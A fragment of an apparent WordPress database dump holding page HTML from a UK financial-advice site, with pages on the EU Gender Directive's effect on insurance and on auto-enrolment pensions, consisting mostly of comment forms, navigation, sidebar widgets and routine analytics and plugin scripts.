October 17, 2017 at 11:12 am<a class=\"comment-reply-link\" href=\"/\" onclick=\"return addComment.moveForm(&quot;comment-205&quot;, &quot;205&quot;, &quot;respond&quot;, &quot;554&quot;)\"> - Reply</a>				</div>&#13;\n&#13;\n				<div class=\"comment-text\">&#13;\n										<p>[...] for life – are being urged to purchase before the introduction of the new EU Gender Directive (G-Day), which comes into force on 21st December, to benefit from higher interest [...]</p>&#13;\n				</div>&#13;\n&#13;\n			</div>&#13;\n&#13;\n		</div>&#13;\n&#13;\n</li><!-- #comment-## -->&#13;\n		</ol><div class=\"comments-navigation\">&#13;\n		    <div class=\"alignleft\"/>&#13;\n		    <div class=\"alignright\"/>&#13;\n		</div>&#13;\n	</div>&#13;\n&#13;\n&#13;\n&#13;\n									<div id=\"respond\" class=\"comment-respond\">&#13;\n				<h3 id=\"reply-title\" class=\"comment-reply-title\"><div class=\"title\"><h2> </h2><div class=\"title-sep-container\"><div class=\"title-sep\"/></div></div> <small><a rel=\"nofollow\" id=\"cancel-comment-reply-link\" href=\"/g-day-impact-gender-directive-insurance\" style=\"display:none;\">Cancel reply</a></small>&#13;\n									</h3><form action=\"/\" method=\"post\" id=\"commentform\" class=\"comment-form\">&#13;\n																										<div id=\"comment-input\"><input type=\"text\" name=\"author\" id=\"author\" value=\"\" placeholder=\"Name (required)\" size=\"22\" tabindex=\"1\" aria-required=\"true\" class=\"input-name\"/><input type=\"text\" name=\"email\" id=\"email\" value=\"\" placeholder=\"Email (required)\" size=\"22\" tabindex=\"2\" aria-required=\"true\" class=\"input-email\"/></div>&#13;\n												<div id=\"comment-textarea\"/>												<p class=\"form-submit\">&#13;\n							<input name=\"submit\" type=\"submit\" id=\"comment-submit\" value=\"Post Comment\"/><input type=\"hidden\" name=\"comment_post_ID\" value=\"554\" id=\"comment_post_ID\"/></p>&#13;\n						<p style=\"display: none;\"><input type=\"hidden\" id=\"akismet_comment_nonce\" name=\"akismet_comment_nonce\" value=\"b090643fb2\"/></p>&#13;\n<p style=\"display: none;\"><input type=\"hidden\" id=\"ak_js\" name=\"ak_js\" value=\"132\"/></p>					&#13;\n							</form></div><!-- #respond -->&#13;\n			        <script type=\"text/javascript\"><![CDATA[\r\n            jQuery(document).ready(function () {\r\n                jQuery(\'#commentform\').submit(function () {\r\n                    _gaq.push(\r\n                            [\'_setAccount\', \'UA-10958181-3\'],\r\n                            [\'_trackEvent\', \'comment\', \'submit\']\r\n                    );\r\n                });\r\n            });\r\n        ]]></script></div>&#13;\n			</div>&#13;\n		<div id=\"sidebar\" style=\"\">&#13;\n	<div id=\"text-24\" class=\"widget widget_text\">			<div class=\"textwidget\"><center><big><big><big>JOIN OVER 5,000</big></big></big><br/><br/>people who get our best financial wisdom on a weekly basis.</center><br/><a href=\"https://my.leadpages.net/leadbox/1449111f3f72a2%3A125d9572eb46dc/5763711893504000/\" onclick=\"javascript:_gaq.push([\'_trackEvent\',\'outbound-widget\',\'http://my.leadpages.net\']);\" target=\"_blank\"/><script type=\"text/javascript\" src=\"/leadbox-694.js\"/></div>&#13;\n		</div><div id=\"recent_works-widget-2\" class=\"widget recent_works\"><div class=\"heading\"><p>New Guides</p></div>		<div class=\"recent-works-items clearfix\">&#13;\n										<a href=\"/portfolio-items/smart-money-nov-dec\" title=\"Smart Money: Nov-Dec\">&#13;\n					</a>&#13;\n								<a href=\"/portfolio-items/critical-illness-guide\" title=\"Critical Illness Guide\">&#13;\n					</a>&#13;\n								<a href=\"/portfolio-items/guide-auto-enrolment\" title=\"A Guide To Auto Enrolment\">&#13;\n					</a>&#13;\n				</div>&#13;\n&#13;\n		</div><div id=\"pyre_tabs-widget-2\" class=\"widget pyre_tabs\">		<div class=\"tab-holder\">&#13;\n			<div class=\"tab-hold tabs-wrapper\">&#13;\n				<ul id=\"tabs\" class=\"tabset tabs\"><li><a href=\"#tab-popular\">Popular</a></li>&#13;\n															<li><a href=\"#tab-recent\">Recent</a></li>&#13;\n														</ul><div class=\"tab-box tabs-container\">&#13;\n										<div id=\"tab-popular\" class=\"tab tab_content\" style=\"display: none;\">&#13;\n												<ul class=\"news-list\"><li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"/can-i-sell-my-pension-under-55\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"/can-i-sell-my-pension-under-55\">Can I sell my Pension under 55?</a>&#13;\n									<div class=\"meta\">&#13;\n										October 12th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"/best-annuity-rates\">&#13;\n										<img width=\"52\" height=\"43\" src=\"/wp-content/uploads/2013/02/Lighthouse-symbolism-image-photo1-e1364375976209.jpg\" class=\"attachment-tabs-img wp-post-image\" alt=\"Annuity Rates\"/></a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"/best-annuity-rates\">What Are The Best Annuity Rates in The UK</a>&#13;\n									<div class=\"meta\">&#13;\n										March 21st, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"/\">The UK’s Income Protection Time Bomb</a>&#13;\n									<div class=\"meta\">&#13;\n										September 10th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"/g-day-impact-gender-directive-insurance\">&#13;\n										<img width=\"52\" height=\"21\" src=\"/wp-content/uploads/2012/09/headline-image-composite-preview.jpg\" class=\"attachment-tabs-img wp-post-image\" alt=\"headline-image-composite-preview\"/></a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"/g-day-impact-gender-directive-insurance\">G-day – Impact of the Gender Directive on Insurance</a>&#13;\n									<div class=\"meta\">&#13;\n										September 18th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"/what-does-a-wealth-managerdo\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"/what-does-a-wealth-managerdo\">What Does a Wealth Manager Do?</a>&#13;\n									<div class=\"meta\">&#13;\n										September 5th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n													</ul></div>&#13;\n															<div id=\"tab-recent\" class=\"tab tab_content\" style=\"display: none;\">&#13;\n												<ul class=\"news-list\"><li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"/\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"/\">How Your Smartphone Can Improve Your Health</a>&#13;\n									<div class=\"meta\">&#13;\n										June 10th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"/5-facts-know-annuities\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"/5-facts-know-annuities\">5 Facts You Should Know About Annuities</a>&#13;\n									<div class=\"meta\">&#13;\n										June 9th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"/new-individual-savings-accounts-qa\">The New Individual Savings Accounts — Q&amp;A</a>&#13;\n									<div class=\"meta\">&#13;\n										June 6th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"/automatic-enrolment\">What is Automatic Enrolment</a>&#13;\n									<div class=\"meta\">&#13;\n										June 6th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"/staging-date-social-advisors\">When is your Staging Date Social Advisors</a>&#13;\n									<div class=\"meta\">&#13;\n										June 6th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n													</ul></div>&#13;\n														</div>&#13;\n			</div>&#13;\n		</div>&#13;\n		</div><div id=\"categories-3\" class=\"widget widget_categories\"><div class=\"heading\"><p>Post Categories</p></div><select name=\"cat\" id=\"cat\" class=\"postform\"><option value=\"-1\">Select Category</option><option class=\"level-0\" value=\"13\">Annuities  (2)</option><option class=\"level-0\" value=\"8\">Insurance Protection  (5)</option><option class=\"level-0\" value=\"5\">Investments  (3)</option><option class=\"level-0\" value=\"4\">Pensions  (9)</option><option class=\"level-0\" value=\"6\">Trusts  (1)</option><option class=\"level-0\" value=\"33\">Video  (4)</option><option class=\"level-0\" value=\"1\">Wealth Management  (17)</option></select><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\n	var dropdown = document.getElementById(\"cat\");\r\n	function onCatChange() {\r\n		if ( dropdown.options[dropdown.selectedIndex].value > 0 ) {\r\n			location.href = \"http://www.equalitywalk.org.uk/?cat=\"+dropdown.options[dropdown.selectedIndex].value;\r\n		}\r\n	}\r\n	dropdown.onchange = onCatChange;\r\n/* ]]]]><![CDATA[> */\r\n]]></script></div><div id=\"social_links-widget-2\" class=\"widget social_links\"><div class=\"heading\"><p>Get Social</p></div>		<ul class=\"social-networks  clearfix\"><li class=\"rss\">&#13;\n				<a class=\"rss\" href=\"http://feeds.feedburner.com/Equity SMART\" target=\"_blank\" rel=\"nofollow\">RSS</a>&#13;\n				<div class=\"popup\">&#13;\n					<div class=\"holder\">&#13;\n						<p>RSS</p>&#13;\n					</div>&#13;\n				</div>&#13;\n			</li>&#13;\n												<li class=\"twitter\">&#13;\n				<a class=\"twitter\" href=\"https://twitter.com/Invest\" target=\"_blank\" rel=\"nofollow\">Twitter</a>&#13;\n				<div class=\"popup\">&#13;\n					<div class=\"holder\">&#13;\n						<p>Twitter</p>&#13;\n					</div>&#13;\n				</div>&#13;\n			</li>&#13;\n																																																								</ul></div><div id=\"text-23\" class=\"widget widget_text\">			<div class=\"textwidget\"><a href=\"https://my.leadpages.net/leadbox/14392e473f72a2%3A125d9572eb46dc/5699942098141184/\" onclick=\"javascript:_gaq.push([\'_trackEvent\',\'outbound-widget\',\'http://my.leadpages.net\']);\" target=\"_blank\"><img src=\"/WcBxvj97f6ImTTzlT4h-unuce5ZXpmlrf0JzFKpvBWJyilIlbrxaszuw0Y2NMVq3U1GZSw9_oe6GL-pXCIamWAg_s0.jpg\"/></a><script type=\"text/javascript\" src=\"/leadbox-690.js\"/></div>&#13;\n		</div>	</div>&#13;\n		</div>&#13;\n	</div>&#13;\n				<footer class=\"footer-area\"><div class=\"avada-row\">&#13;\n			<section class=\"columns columns-3\"><article class=\"col\"><div id=\"recent-posts-3\" class=\"footer-widget-col widget_recent_entries\">		<p>Our Latest Posts</p>		<ul><li>&#13;\n				<a href=\"/\">How Your Smartphone Can Improve Your Health</a>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"/5-facts-know-annuities\">5 Facts You Should Know About Annuities</a>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"/new-individual-savings-accounts-qa\">The New Individual Savings Accounts — Q&amp;A</a>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"/automatic-enrolment\">What is Automatic Enrolment</a>&#13;\n						</li>&#13;\n				</ul><div style=\"clear:both;\"/></div>				</article><article class=\"col\"><div id=\"contact_info-widget-2\" class=\"footer-widget-col contact_info\"><p>Contact Info</p>		<div class=\"contact-info-container\">&#13;\n				<p class=\"address\">Manchester &amp; London</p>&#13;\n		&#13;\n				<p class=\"phone\">Phone: </p>&#13;\n		&#13;\n		&#13;\n		&#13;\n				<p class=\"email\">Email: <a href=\"mailto:enquiries@equalitywalk.org.uk\">Click To Email</a></p>&#13;\n		&#13;\n				&#13;\n				</div>&#13;\n		<div style=\"clear:both;\"/></div>				</article><article class=\"col\"><div id=\"text-22\" class=\"footer-widget-col widget_text\"><p>Download Your FREE Retirement Guides</p>			<div class=\"textwidget\"><a href=\"https://my.leadpages.net/leadbox/1435eb973f72a2%3A125d9572eb46dc/5753952654065664/\" onclick=\"javascript:_gaq.push([\'_trackEvent\',\'outbound-widget\',\'http://my.leadpages.net\']);\" target=\"_blank\"><img src=\"/w3QPpbD3DJXcyqPrBaexcUOnTpQKlOX0XuzNYejlD3Hwl1wrM5qbyjoyp4eUJt-wEdlJsAojFjru39Y0ZjrDnA_s0.jpg\"/></a><script type=\"text/javascript\" src=\"/leadbox-689.js\"/></div>&#13;\n		<div style=\"clear:both;\"/></div>				</article><article class=\"col last\"/></section></div>&#13;\n	</footer><footer id=\"footer\"/></div><!-- wrapper -->&#13;\n	&#13;\n	<script type=\"text/javascript\" src=\"/maps/api/js_v_3.exp_amp_sensor_false_amp_language_en.js\"/><!-- W3TC-include-js-head --><script type=\"text/javascript\"><![CDATA[\r\njQuery(window).load(function() {\r\n\r\njQuery( \'#wooslider-id-1\' ).flexslider2({namespace: \"wooslider-\"\r\n, animation: \'fade\', slideshowSpeed: 7000, animationSpeed: 600, slideshow: true, directionNav: true, keyboard: false, mousewheel: false, pausePlay: false, randomize: false, animationLoop: true, pauseOnAction: true, pauseOnHover: false, smoothHeight: false, touch: true, controlNav: true});\r\n\r\n});\r\n]]></script><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/js/jquery.form.min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar _wpcf7 = {\"loaderUrl\":\"http://www.equalitywalk.org.uk/wp-content/plugins/contact-form-7/images/ajax-loader.gif\",\"sending\":\"Sending ...\",\"cached\":\"1\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"/wp-content/plugins/contact-form-7/includes/js/scripts.js\"/><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/js/swfupload.min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar iphormL10n = {\"error_submitting_form\":\"An error occurred submitting the form\",\"swfupload_flash_url\":\"http://www.equalitywalk.org.uk/wp-includes/js/swfupload/swfupload.swf\",\"swfupload_upload_url\":\"http://www.equalitywalk.org.uk/?iphorm_swfupload=1\",\"swfupload_too_many\":\"You have attempted to queue too many files\",\"swfupload_file_too_big\":\"This file exceeds the maximum upload size\",\"swfupload_file_empty\":\"This file is empty\",\"swfupload_file_type_not_allowed\":\"This file type is not allowed\",\"swfupload_unknown_queue_error\":\"Unknown queue error, please try again later\",\"swfupload_upload_error\":\"Upload error\",\"swfupload_upload_failed\":\"Upload failed\",\"swfupload_server_io\":\"Server IO error\",\"swfupload_security_error\":\"Security error\",\"swfupload_limit_exceeded\":\"Upload limit exceeded\",\"swfupload_validation_failed\":\"Validation failed\",\"swfupload_upload_stopped\":\"Upload stopped\",\"swfupload_unknown_upload_error\":\"Unknown upload error\",\"plugin_url\":\"http://www.equalitywalk.org.uk/wp-content/plugins/iphorm-form-builder\",\"preview_no_submit\":\"The form cannot be submitted in the preview\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/js/jquery.iphorm.js\"/><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/js/jquery.smooth-scroll.min.js\"/><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/js/qtip2/jquery.qtip.min.js\"/><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/js/fancybox/jquery.fancybox-1.3.4.pack.js\"/><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/js/uniform/jquery.uniform.min.js\"/><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/js/jquery.infieldlabel.min.js\"/><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/themes/light/rounded.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/framework/plugins/tf-flexslider/assets/js/jquery.mousewheel.min.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/framework/plugins/tf-flexslider/assets/js/jquery.flexslider.min.js\"/><script type=\"text/javascript\" src=\"/wp-includes/js/comment-reply.min.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/js/modernizr-min.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/js/jquery.carouFredSel-6.2.1-min.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/js/jquery.prettyPhoto-min.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/js/jquery.flexslider-min.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/js/jquery.fitvids-min.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/js/gmap-min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar js_local_vars = {\"dropdown_goto\":\"Go to...\",\"mobile_nav_cart\":\"Shopping Cart\",\"page_smoothHeight\":\"false\",\"flex_smoothHeight\":\"false\",\"language_flag\":\"ICL_LANGUAGE_CODE\",\"infinite_blog_finished_msg\":\"<em>All posts displayed</em>\",\"infinite_blog_text\":\"<em>Loading the next set of posts...</em>\",\"portfolio_loading_text\":\"<em>Loading Portfolio Items...</em>\",\"faqs_loading_text\":\"<em>Loading FAQ Items...</em>\",\"order_actions\":\"Details\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/js/main.js\"/></body>','&#13;	G-day - Impact of the Gender Directive on Insurance','The cost of some UK Insurance Protection will go up by 25% on December 21 2012 – Find out how it could affect you and how to beat the rise.','publish','closed','closed','','g-day-impact-of-the-gender-directive-on-insurance','','','2017-09-21 17:35:45','2017-09-21 17:35:45','',77,'http://www.equalitywalk.org.uk/g-day-impact-of-the-gender-directive-on-insurance',0,'page','',0),(67,1,'2017-09-21 16:34:30','2017-09-21 16:34:30','<body class=\"single single-post postid-8390 single-format-standard light  wpb-js-composer js-comp-ver-4.1.2 vc_responsive\" data-spy=\"scroll\">&#13;\n&#13;\n&#13;\n&#13;\n&#13;\n	<div id=\"wrapper\">&#13;\n								<div class=\"header-wrapper\">&#13;\n			<div class=\"header-v4\">&#13;\n		<div class=\"header-social\">&#13;\n		<div class=\"avada-row\">&#13;\n			<div class=\"alignleft\">&#13;\n				<div class=\"header-info\">The 2017 Budget Announcement Will Improve Pension Planning for Everyone. Make Sure You Know How? <b><a href=\"../pensions/pension-review/\">Learn More&gt;&gt;</a></b><a href=\"mailto:\"/></div>&#13;\n			</div>&#13;\n			<div class=\"alignright\">&#13;\n							</div>&#13;\n		</div>&#13;\n	</div>&#13;\n		<header id=\"header\"><div class=\"avada-row\" style=\"margin-top:0px;margin-bottom:0px;\">&#13;\n			<div class=\"logo\" style=\"margin-right:0px;margin-top:0px;margin-left:0px;margin-bottom:0px;\">&#13;\n				<a href=\"/\">&#13;\n					<img src=\"../wp-content/uploads/2013/06/RSR-Logo.png\" alt=\"Equity SMART\" class=\"normal_logo\"/></a>&#13;\n			</div>&#13;\n									<h3 class=\"tagline\">Call Us Now<br/><big><big><b/></big></big>&#13;\n								</h3></div>&#13;\n	</header><div id=\"small-nav\">&#13;\n		<div class=\"avada-row\">&#13;\n						<nav id=\"nav\" class=\"nav-holder\"><ul class=\"navigation menu fusion-navbar-nav\"><li id=\"menu-item-7671\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-home menu-item-7671\"><a href=\"/\">Home</a></li>&#13;\n<li id=\"menu-item-7214\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-7214 fusion-dropdown-menu\"><a href=\"../wealth-management/\">Wealth Management</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-44\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-44 fusion-dropdown-submenu\"><a href=\"../wealth-platform/\">Wealth Platform</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-27\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-27 fusion-megamenu-menu\"><a href=\"../pensions/\">Pensions</a>&#13;\n<div class=\"fusion-megamenu-wrapper columns-2 col-span-2 container\"><div class=\"row\">&#13;\n&#13;\n<ul class=\"fusion-megamenu-holder\"><ul class=\"fusion-megamenu \"><li id=\"menu-item-8353\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-8353 fusion-megamenu-submenu fusion-megamenu-columns-2 col-lg-6 col-md-6 col-sm-6\"><h3 class=\"fusion-megamenu-title\">Pensions&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-967\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-967\"><a href=\"../pensions/pension-release/\"><span class=\"fusion-megamenu-bullet\"/>Pension Release</a></li>&#13;\n		<li id=\"menu-item-741\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-741\"><a href=\"../pensions/pension-transfer/\"><span class=\"fusion-megamenu-bullet\"/>Pension Transfer</a></li>&#13;\n		<li id=\"menu-item-136\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-136\"><a href=\"../pensions/auto-enrolment-pensions/\"><span class=\"fusion-megamenu-bullet\"/>Auto Enrolment Pensions</a></li>&#13;\n		<li id=\"menu-item-6494\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6494\"><a href=\"../auto-enrolment-report/\"><span class=\"fusion-megamenu-bullet\"/>Auto Enrolment Report</a></li>&#13;\n		<li id=\"menu-item-105\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-105\"><a href=\"../pensions/stakeholder-pensions/\"><span class=\"fusion-megamenu-bullet\"/>Stakeholder Pensions</a></li>&#13;\n		<li id=\"menu-item-127\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-127\"><a href=\"../pensions/occupational-pensions/\"><span class=\"fusion-megamenu-bullet\"/>Occupational Pensions</a></li>&#13;\n		<li id=\"menu-item-6154\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6154\"><a href=\"../pensions/pension-review/\"><span class=\"fusion-megamenu-bullet\"/>Pension Review</a></li>&#13;\n	</ul></h3></li>&#13;\n	<li id=\"menu-item-6852\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-6852 fusion-megamenu-submenu fusion-megamenu-columns-2 col-lg-6 col-md-6 col-sm-6\"><h3 class=\"fusion-megamenu-title\">More Information&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-139\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-139\"><a href=\"../pensions/income-drawdown/\"><span class=\"fusion-megamenu-bullet\"/>Income Drawdown</a></li>&#13;\n		<li id=\"menu-item-95\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-95\"><a href=\"../pensions/sipps/\"><span class=\"fusion-megamenu-bullet\"/>SIPPS</a></li>&#13;\n		<li id=\"menu-item-6848\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6848\"><a href=\"../tracking-down-your-lost-pension/\"><span class=\"fusion-megamenu-bullet\"/>Lost Pension</a></li>&#13;\n		<li id=\"menu-item-133\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-133\"><a href=\"../pensions/group-pension-plan/\"><span class=\"fusion-megamenu-bullet\"/>Group Pension Plan</a></li>&#13;\n	</ul></h3></li>&#13;\n&#13;\n</ul></ul><div style=\"clear:both;\"/>&#13;\n</div>&#13;\n</div>&#13;\n</li>&#13;\n<li id=\"menu-item-47\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-47 fusion-dropdown-menu\"><a href=\"..\">Investments</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-121\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-121 fusion-dropdown-submenu\"><a href=\"..isas/\">ISAs</a></li>&#13;\n	<li id=\"menu-item-118\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-118 fusion-dropdown-submenu\"><a href=\"..lump-sum-investment/\">Lump Sum Investment</a></li>&#13;\n	<li id=\"menu-item-102\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-102 fusion-dropdown-submenu\"><a href=\"..offshore-bonds/\">Offshore Bonds</a></li>&#13;\n	<li id=\"menu-item-124\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-124 fusion-dropdown-submenu\"><a href=\"..unit-trusts-oeics/\">Unit Trusts &amp; OEICs</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-46\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-46 fusion-dropdown-menu\"><a href=\"../\">Trusts</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-108\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-108 fusion-dropdown-submenu\"><a href=\"../asset-protection-trust/\">Asset Protection Trust</a></li>&#13;\n	<li id=\"menu-item-114\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-114 fusion-dropdown-submenu\"><a href=\"../discretionary-\">Discretionary Trusts</a></li>&#13;\n	<li id=\"menu-item-115\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-115 fusion-dropdown-submenu\"><a href=\"../absolute-\">Absolute Trusts</a></li>&#13;\n	<li id=\"menu-item-143\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-143 fusion-dropdown-submenu\"><a href=\"../gift-loan-schemes/\">Gift &amp; Loan Trust</a></li>&#13;\n	<li id=\"menu-item-146\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-146 fusion-dropdown-submenu\"><a href=\"../wills-and-trust/\">Wills and Trust</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-3381\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-3381 fusion-dropdown-menu\"><a href=\"../insurance-protection/\">Insurance</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-3535\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-3535 fusion-dropdown-submenu\"><a href=\"../critical-illness-insurance-2-0/\">Critical Illness</a></li>&#13;\n	<li id=\"menu-item-3585\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-3585 fusion-dropdown-submenu\"><a href=\"../serious-illness-cover/\">Serious Illness</a></li>&#13;\n	<li id=\"menu-item-4633\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-4633 fusion-dropdown-submenu\"><a href=\"../relevant-life-plan/\">Relevant Life Plan</a></li>&#13;\n	<li id=\"menu-item-7228\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7228 fusion-dropdown-submenu\"><a href=\"../life-insurance/\">Life Insurance</a></li>&#13;\n	<li id=\"menu-item-7243\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7243 fusion-dropdown-submenu\"><a href=\"../business-protection-insurance/\">Business Protection</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-7672\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-7672 fusion-dropdown-menu\"><a href=\"../about-us/\">About</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-7676\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7676 fusion-dropdown-submenu\"><a href=\"../our-team/\">Our Team</a></li>&#13;\n	<li id=\"menu-item-7677\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7677 fusion-dropdown-submenu\"><a href=\"../about-us/testimonials/\">Testimonials</a></li>&#13;\n	<li id=\"menu-item-7673\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-7673 fusion-dropdown-submenu\"><a href=\"https://rsr.wrapadviser.co.uk/home.aspx?logout=1\" onclick=\"javascript:_gaq.push([\'_trackEvent\',\'outbound-menu\',\'http://rsr.wrapadviser.co.uk\']);\">Login</a></li>&#13;\n	<li id=\"menu-item-7680\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7680 fusion-dropdown-submenu\"><a href=\"../terms-of-use/\">Terms Of Use</a></li>&#13;\n	<li id=\"menu-item-7681\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7681 fusion-dropdown-submenu\"><a href=\"../privacy-policy/\">Privacy Policy</a></li>&#13;\n	<li id=\"menu-item-7682\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7682 fusion-dropdown-submenu\"><a href=\"../cookies/\">Cookies</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-7674\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-7674 fusion-dropdown-menu\"><a href=\"../our-blog/\">Blog</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-7678\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7678 fusion-dropdown-submenu\"><a href=\"../resources/\">Resources</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-7675\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7675\"><a href=\"../contact-us/\">Contact</a></li>&#13;\n		</ul></nav><div class=\"mobile-nav-holder main-menu\"/>&#13;\n					</div>&#13;\n	</div>&#13;\n</div>		<div class=\"init-sticky-header\"/>&#13;\n		</div>&#13;\n						<div id=\"sliders-container\">&#13;\n									</div>&#13;\n		&#13;\n			<div class=\"page-title-container\">&#13;\n		<div class=\"page-title\">&#13;\n			<div class=\"page-title-wrapper\">&#13;\n				<div class=\"page-title-captions\">&#13;\n										<h1 class=\"entry-title\">&#13;\n										How To Get The Most From Auto-Enrolment										</h1>&#13;\n														</div>&#13;\n															<ul class=\"breadcrumbs\"><li> <a href=\"/\">Home</a></li><li><a href=\"../category/wealth-management/\" title=\"Wealth Management\">Wealth Management</a></li><li><a href=\"../category/pensions/\" title=\"Pensions\">Pensions</a></li><li>How To Get The Most From 